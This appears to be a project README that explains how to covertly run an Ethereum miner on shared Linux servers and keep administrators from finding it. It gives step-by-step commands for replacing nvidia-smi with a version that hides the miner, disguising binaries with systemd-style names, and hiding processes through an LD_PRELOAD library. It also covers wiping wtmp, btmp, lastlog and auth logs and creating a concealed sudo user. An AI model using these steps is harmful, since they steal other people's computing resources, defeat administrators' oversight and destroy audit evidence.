
Perfectly hide your ETH miner in a linux server

Primary LanguagePython


Since ETH has changed from PoW to PoS and can no longer be mined by GPUs, I open source this code I used to hide my ETH miner in our groups servers. I believe this code can reflect my craftsman spirit, as I constantly upgraded the code to prevent administrator's detection during mining and won finally. In addition to these codes, I even made a disguised nvtop (a htop-like tool for GPU) to hide the miner process and GPU usage.


  • exec: executed file.

    • nvidia-smi: excludes systemd-diagnosis in nvidia-smi panel.
    • systemd-firewall: is an adaptive system resource allocator determines which GPU the slave miners work on.
    • systemd-update: is the same to the systemd-firewall but more merciful that only works at midnight.
    • systemd-diagnosis: is the pool slave miner(Phoenix miner main file).
    • libGNU.co: hides specified processes for ps, top ,and htop.
  • source: corresponding source code of the executed file in ./exec.


run the Makefile by sudo make. If you want to be blamed, run it without sudo.


environmental setting

make sure you have:

  • gcc, which is preinstalled in your system.
  • pyinstaller, installed by pip install pyinstaller.


  1. please make sure the variable skip in source/nvidia-smi.py is the same to the slave miner's file name.
  2. rename original nvidia-smi by nl-toolkit in /usr/bin.
  3. move the degraded nvidia-smi to /usr/bin.
  4. add read and execution permissions by chmod +rx nvidia-smi.


  1. move systemd-firewall to /usr/bin.
  2. add read and execution permissions by chmod +rx systemd-firewall.


  1. same to the systemd-firewall.


  1. move libGNU.co to /usr/lib.
  2. add /usr/lib/libGNU.so to /etc/ld.so.preload; or add export LD_PRELOAD=/usr/lib/libGNU.so to /etc/profile (remember to execute source /etc/profile to make it effective).

Risk: add these files to system environment is easy to detect just by cat /etc/ld.so.preload or echo $LD_PRELOAD.


Very important: run sudo -s first!

Slash the miner

  1. nohup systemd-firewall 2>&1 > /dev/null &.
  2. check mining status by nl-toolkit.

Check degraded files

  1. nvidia-smi.
  2. ps aux | grep 'f2pool\|systemd-firewall\|systemd-diagnosis\|nl-toolkit'.
  3. top -u root or htop -u root.

Clean login log

  1. revise following files by
utmpdump [logfile] > tmp_output.txt
utmpdump -r tmp_output.txt > [logfile]
  • last: /var/log/wtmp.
  • lastb: /var/log/btmp.

clean lastlog by > /var/log/lastlog if you are root user, or by vi /var/log/lastlog for otherwise.

  1. delete your login log in /var/log/auth.log (for Ubuntu).
  2. delete your login log in /var/log/secure.log (for CentOS).


  • Add a new user by useradd [your name] -G sudo -d /usr/bin -s /bin/bash -l -M. -l can avoid you be added to last and lastb, but does not work for lastlog. -M will not create your home directory.
  • edit /etc/passwd to get more privileges for your account.